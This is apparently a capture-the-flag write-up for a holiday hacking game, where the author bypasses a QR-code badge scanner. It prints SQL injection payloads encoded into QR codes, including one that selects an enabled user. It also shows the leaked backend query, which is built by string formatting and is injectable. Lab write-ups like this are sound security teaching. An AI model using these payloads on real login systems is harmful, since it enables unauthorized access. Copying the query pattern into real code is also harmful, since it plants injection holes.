Badge Manipulation

Objective #6
Upper Level

Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available. What is the access control number revealed by the door authentication panel?

For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.

Pepper Minstix

Barcode Creation hint from Pepper Minstix
Creating QR barcodes

SQL Injection hint from Pepper Minstix
SQL Injection

All of the Kringle Castle employees have these cool cards with QR codes on them that give us access to restricted areas.
Unfortunately, the badge-scan-o-matic said my account was disabled when I tried scanning my badge.
I really needed access so I tried scanning several QR codes I made from my phone but the scanner kept saying "User Not Found".
I researched a SQL database error from scanning a QR code with special characters in it and found it may contain an injection vulnerability.
I was going to try some variations I found on OWASP but decided to stop so I don't tick-off Alabaster.

Opening Scan-O-Matic presents with a terminal, which allows to upload QR code images.

initial Scan-O-Matic screen

Let's install qrcode to generate QR images.

pip install qrcode pillow

Trying simple 1234 results in NO AUTHORIZED USER ACCOUNT FOUND!

qrcode 1234 > qr.png

unauthorized Scan-O-Matic

Trying simple SQL injection reveals much information.

qrcode "'" > qr.png
EXCEPTION AT (LINE 96 \"user_info = query(\"SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1\".format(uid))\"): (1064, u\"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 1' at line 1\")

Therefore, it can be assumed that Python code with SQL query in backend looks like this:

user_info = query("SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1".format(uid))

Trying standard SQL injection ' OR '1'='1 returns Authorized User Account Has Been Disabled!

qrcode "' OR '1'='1" > qr.png

That means that user was selected with enabled as 0. Let's fix that by more intelligent SQL injection, like ' OR enabled=1 -- .

qrcode "' OR enabled=1 -- " > qr.png

Success! Terminal returns User Access Granted - Control number 19880715.

authorized Scan-O-Matic

Answer to this objective is 19880715.

Die Hard (1988) ... It was released on July 15, 1988.